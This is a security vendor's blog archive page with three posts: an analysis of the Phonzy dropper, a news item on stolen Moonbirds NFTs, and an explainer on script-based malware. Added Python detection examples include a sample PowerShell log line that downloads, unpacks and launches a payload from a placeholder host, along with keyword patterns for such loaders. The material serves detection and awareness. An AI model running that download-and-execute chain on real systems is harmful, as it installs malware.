Script-based Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/script-based/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Feed last updated Thu, 14 Mar 2024 16:03:49 +0000.

Trojan:Script/Phonzy.B!ml
https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/
Published Tue, 27 Feb 2024 08:45:57 +0000 on Gridinsoft Blog.
Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans.

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender uses to mark small malware families. Such malicious programs may have similar behavior and code elements but belong to different groups.

Phonzy.B!ml detection in Microsoft Defender

Functionally, Phonzy.B!ml is a scripted dropper. Its main purpose is to download and launch additional malware without requiring any user interaction. Phonzy samples are also able to collect some basic information about the system, such as location, OS version and the like. A typical payload delivered in Phonzy attacks is a banking trojan, a specific type of stealer that targets online banking credentials.

Is Phonzy B!ml False Positive?

A closer look at the naming convention Microsoft uses in its detection names shows that the “!ml” suffix stands for “machine learning”: the file was flagged by Defender’s ML-based detection engine. That engine is effective and promising, but its verdicts need confirmation from signature-based detection. Without that confirmation, false positives are common.

Unfortunately, there is hardly any reliable way to tell a real detection from a false one by inspection. Modern malware does its best to hide among legitimate programs and files, so the file location is not informative. That is why I recommend scanning your system with GridinSoft Anti-Malware.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name, it is rather hard to find a single well-known sample to analyze. For that reason, I analyzed several of them to get a better understanding of what this malware is capable of. In short, it is a rather simple dropper that can make a huge mess of the system it infects.

Launch & Unpacking

The majority of Phonzy samples I have encountered arrive in a packed form, encrypted and/or archived. This is usually done for two reasons: to evade static detection and to complicate analysis. In Phonzy’s case, I lean toward the first.

Process of malware unpacking

To unpack itself, Phonzy relies on the script that delivered it to the system. This is usually a PowerShell script that pulls the dropper from an intermediary server and is also responsible for launching it; a part of the same script unpacks and launches the sample once the download completes.
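As an added example (not Phonzy code or a Gridinsoft tool), the following Python snippet turns the chain just described into a detection: it scores the text of PowerShell script blocks, such as the body of Event ID 4104 log entries, for the download, unpack and launch stages and flags blocks that combine download with execution. The log lines and the intermediary host name are constructed for the demonstration.

```python
import re

# One pattern per stage of the loader chain the post describes; PowerShell
# is case-insensitive, so the search is too.
STAGES = {
    "download": r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer",
    "unpack": r"Expand-Archive|FromBase64String|Decompress",
    "execute": r"Invoke-Expression|\biex\b|Start-Process|rundll32|regsvr32",
}


def classify_block(text: str) -> dict:
    """Return the stages found in one script block and a loader verdict."""
    hits = {stage: bool(re.search(pat, text, re.I)) for stage, pat in STAGES.items()}
    # Download and execution in the same block is the loader signature;
    # an unpack stage in between raises confidence but is not required.
    return {"stages": [s for s, h in hits.items() if h],
            "loader": hits["download"] and hits["execute"]}


def scan_log(lines: list) -> list:
    """Return the ids of script blocks that look like a download-and-run loader."""
    flagged = []
    for line in lines:
        block_id, _, body = line.partition("|")  # split on the first '|' only
        if classify_block(body)["loader"]:
            flagged.append(block_id.strip())
    return flagged


# Constructed script-block log, one entry per line as "<id>|<script text>".
# blk-2 mirrors the chain in the post (fetch from an intermediary host, unpack,
# launch); blk-1 and blk-3 are ordinary administration and a plain download.
SAMPLE_LOG = [
    r"blk-1|Get-ChildItem C:\Logs -Filter *.log | Measure-Object",
    r"blk-2|Invoke-WebRequest -Uri http://intermediary.invalid/p.zip -OutFile $env:TEMP\p.zip; "
    r"Expand-Archive $env:TEMP\p.zip $env:TEMP\p; Start-Process $env:TEMP\p\svc.exe",
    r"blk-3|Invoke-WebRequest -Uri https://updates.example.invalid/notes.txt -OutFile notes.txt",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(entry.split("|", 1)[0], classify_block(entry.split("|", 1)[1]))
    print("flagged:", scan_log(SAMPLE_LOG))
```

Only blk-2 is flagged; blk-3 downloads a file but never executes anything, which is the distinction that keeps ordinary update scripts out of the alert.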

Gathering system information

Once launched, Trojan:Script/Phonzy.B!ml collects basic information about the target system. This may include the operating system version, hardware information, a list of installed programs and devices, and the device’s geolocation. Such information is mostly used to fingerprint the system, i.e. to assign it an identifier derived from its internals. In addition to system info, some Phonzy.B!ml samples were able to take screenshots of the infected device’s screen.

System info collected by one of the Phonzy samples

Contacting Command & Control Server

The next step in the attack is contacting the command server. The malware sends an HTTP POST request to the C2 to report a new infection and upload the collected data. Depending on the server response, it may go idle or start downloading other malware. Overall, Phonzy’s C2 communication is simple and unremarkable.

Delivering other malware

The key action of the Phonzy trojan is, obviously, deploying other malware samples to the infected system. It receives from the C2 the IP address it should pull the payload from and the way this payload should be launched. Usually, that IP address belongs to a compromised website that the attackers use as an intermediary server.

The ways of running the payload are typical for droppers. All of the Phonzy samples I analyzed were able to handle both DLLs and executable files. DLLs are launched through DLL hijacking or by hooking into a system DLL, while executables are simply run as regular .exe files.

Self-Propagation to USB Drives

Some of the inspected variants of Phonzy.B!ml were capable of self-propagating via attached flash drives or other removable storage media. This is a rather unusual trick for modern malware, as security vendors developed ways to detect virus-like spreading long ago. Nonetheless, its effectiveness cannot be denied: a single infected USB drive can infect dozens of other systems without a single click from the malware operators.

How To Remove Trojan:Script/Phonzy.B!ml

To remove Phonzy B!ml, I’d recommend using GridinSoft Anti-Malware. Because a dropper can bring a lot of other malware with it, advanced software is needed to remove all of it. GridinSoft Anti-Malware will check every little bit of the system and eliminate even the stealthiest malware. Launch a Full scan, wait for it to finish and remove the detections; that will clean up your system.


Safety Recommendations

To avoid infection of your system, it is sufficient to follow basic cyber hygiene. The first rule is to avoid pirated software and sites that distribute it. Cracked software is an ideal shell for malware delivery, so it is not just about being careful – it is about staying away.

Having an advanced protection tool, like Gridinsoft Anti-Malware, is another key to keeping your system secure. Proactive protection coupled with an AI detection engine will weed out attempts by malicious software to get in. Its Removable Device Protection feature will also block the Phonzy trojan when it attempts to infect the system via a USB drive.

29 Moonbirds Stolen via Link Click from a Proof Collective Member
https://gridinsoft.com/blogs/moonbirds-stolen/
Published Wed, 01 Jun 2022 16:18:05 +0000 on Gridinsoft Blog.
29 Moonbirds, NFTs worth around 750 ETC (approximately $1.5M), were stolen from an unnamed Proof Collective member as a result of a scam, according to a May 25 tweet by @CirrusNFT. The theft happened when the victim clicked an unverified link and signed a transaction offered by a scammer who posed as a legitimate buyer.

The source of the news: a tweet by @CirrusNFT.

Another Proof Collective member, nicknamed Dollar (@knownasdollar on Twitter), hinted that the scammer had been identified as @DVincent_ through doxxing via an exchange. According to the tweet, the total value of the items stolen by him (or her?) reached around $2M.

Dollar and other Proof Collective members have already filed a report to the FBI; however, in his tweet, Dollar gave the crook a chance to avoid jail by delivering the stolen NFTs back.

The tweet by @knownasdollar exposing the Twitter account of the alleged criminal.

In the comments on Dollar’s message, other users confirmed that the alleged scammer had also tried to lure them into selling NFTs while insisting that the deal be struck on a questionable peer-to-peer exchange.

The Twitter page of @DVincent_ is already inaccessible. Well, of course!

Proof Collective is a mysterious private club of non-fungible token collectors founded by Kevin Rose. To become a member, one must own a Proof Collective NFT. The membership fee is high enough to scare off random passers-by: 88 ETC, which was more than $200 000 as of May 2022. Proof Collective is most famous for Moonbirds, a highly hyped NFT campaign (selling 10 000 owl avatars for 2.5 ETC each) launched on April 16, 2022.

Script-based malware. How to stay protected?
https://gridinsoft.com/blogs/script-based-malware/
Published Wed, 29 Dec 2021 07:23:27 +0000 on Gridinsoft Blog.
Over the last four years, the share of script-based attacks among malware offenses worldwide has grown so drastically that it has raised alarm among security specialists and ordinary users alike. In this post, we look at script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to maintain security in your workgroup.

Security News: Greta Thunberg became the most popular character in phishing campaigns.

What is script-based malware?

To understand how someone can run a script-based attack on a computer, we must first know what scripts are. They are sets of commands for a system to execute. Users employ them to automate processes that they would otherwise perform manually. Programmers and advanced users write scripts in scripting languages. Roughly speaking, these can be general-purpose (such as JavaScript, Python, and PHP) or OS-oriented (like PowerShell and AppleScript), and there are also special scripting languages for particular applications and environments.

PowerShell is a handy Windows automation tool and a suitable environment for script-based attacks.

Scripts are neither malicious files in themselves nor the main content of the files they inhabit. Instead, they are permitted components of those documents, legitimate and, in theory, beneficial to the user. Scripts are not compiled: they are interpreted and executed by the software environment on the spot, without prior translation into machine code. For AppleScript, for example, that environment is an Apple operating system; for cross-platform JavaScript used in web pages, any modern web browser can serve as the interpreting environment.

Script-based attacks, then, are cyber-crimes that use scripts as their primary tool.

Related: “Malware” vs. “virus”.

What is so worrying about the script-based attacks?

First of all, scripts are not files, as we already mentioned. Antivirus programs have a hard time detecting them; put bluntly, they are useless against scripts, because modern security software focuses on detecting and removing malicious files. In the case of script-based attacks, then, we are dealing with ghostly malware that is invisible to antivirus programs.

Another important point is that scripts are generally hard to trace. They exist in main memory, soon to be overwritten or erased. It is possible to find the origin of a script if the criminals carelessly leave traces, but they rarely do.

How can an attacker execute malware through a script?

Let’s make it clear: we are not talking about malicious scripts tied to websites (Cross-Site Scripting), which are more or less studied and covered by browser and antivirus security systems. Files fitted with simple yet treacherous scripts constitute a newer problem. These are files in formats that antivirus software lets through by default because it does not regard them as dangerous: PDF, Word, e-books, HTML applications, and others.

Simple JavaScript code embedded in files like these can add various practical functions, such as making a PDF document signable or adding a fillable questionnaire. But the script can have a malicious purpose as well. In a script-based attack, it will most likely be a set of commands that downloads other malware that does the real harm; ransomware, for instance, is the most lucrative type of attack for hackers. The crooks only need the user to open the file to run the script or, in some cases, to enable macros for it.
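As an added example (not code from the Gridinsoft post), the following Python triage script flags the two carriers described above: PDFs that embed JavaScript or auto-run actions, and Office OOXML documents that ship a VBA macro project. The sample documents are constructed in memory; matching PDF name objects in the raw bytes is a heuristic, not a full PDF parser.

```python
import io
import re
import zipfile

# PDF name objects that signal embedded script or automatic actions. Plain-byte
# matching is a triage heuristic: names inside compressed object streams need a real parser.
PDF_MARKERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")

def scan_pdf(data: bytes) -> list:
    """Return the risky PDF name objects present in the raw bytes."""
    if not data.startswith(b"%PDF"):
        return []
    # Require the name to end, so /JS does not fire on e.g. /JSON.
    return [m.decode() for m in PDF_MARKERS
            if re.search(re.escape(m) + rb"(?![A-Za-z])", data)]

def scan_office(data: bytes) -> list:
    """Return zip members that show an OOXML document carries VBA macros."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return []
    return [n for n in names if n.lower().endswith("vbaproject.bin")]

def triage(filename: str, data: bytes) -> dict:
    """Classify one document; 'suspicious' means it carries runnable script."""
    findings = scan_pdf(data) if data.startswith(b"%PDF") else scan_office(data)
    return {"file": filename, "findings": findings, "suspicious": bool(findings)}

# Constructed samples: a PDF whose /OpenAction runs JavaScript when opened,
# a clean PDF, and a .docm-style zip carrying word/vbaProject.bin.
JS_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
          b"2 0 obj << /S /JavaScript /JS (app.alert('hi')) >> endobj\n%%EOF")
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF"

def build_docm() -> bytes:
    """Build a minimal macro-enabled document in memory (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stub")
    return buf.getvalue()

if __name__ == "__main__":
    for name, blob in (("invoice.pdf", JS_PDF), ("report.pdf", CLEAN_PDF),
                       ("form.docm", build_docm())):
        print(triage(name, blob))
```

A document flagged this way is not necessarily malicious, as the post notes that such scripts are often legitimate; the point is that it deserves a look before it is opened on a machine that can run scripts.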

RED FLAG: a downloaded document asks you to enable macros in MS Office.

Script-stuffed files can also be downloads you trust because they appear to update programs you already have. At least, that is what you believe. These can be plug-ins, add-ons, and so on. Yes, the UAC will ask whether you really want to download this file, but this always happens, and we tend to ignore such warnings. If the criminals manage to cheat you, consider that they have also cheated your security software. Incidentally, various untrustworthy PDF readers and their plug-ins are among the most dangerous programs in terms of script-based attack risk.

Script-based attacks mostly endanger Windows systems, exploiting vulnerabilities in Command Prompt and PowerShell, the built-in automation tools. However, neither Android, iOS, nor even Linux is safe.

How to protect yourself and your workgroup?

The weakness of script-based malware is that it has to be run by the user. Therefore, the best protection is to be cautious and avoid unknown downloads. Remember that PDF, Word, and other data files can contain a malicious script. These bogus files are most likely to arrive via e-mail or messengers in messages that seem to come from someone you trust, usually service-providing organizations. Be especially wary of notices from delivery companies like FedEx: since an unexpected parcel is entirely plausible, hackers often use this disguise for their phishing mail. Before downloading any attachment from a suspicious sender, triple-check the source and the message itself. If you are attentive enough, you will find a mistake in the address line, your name, or the text itself.

Watch out for dubious e-mails with enclosed PDF files, Word documents, HTML applications, etc.

In workgroups, it makes sense to separate the computers that need to run scripts from those that can do without them. The former should be handled with extreme vigilance and, preferably, run antivirus software with a zero-trust policy, which at the moment means Windows 11 Defender. It has many issues, but it seriously hampers the plans of attackers who rely on script-based attacks.

Script-fitted files can spread rapidly across a compromised network using the same vulnerabilities in Windows components that they exploit to deliver their malicious payload. General security measures, such as file backups and network segmentation, are also a must to minimize the damage from any successful cyber-attack.

Consider reading: Slow PC. Possible causes and how to fix them.
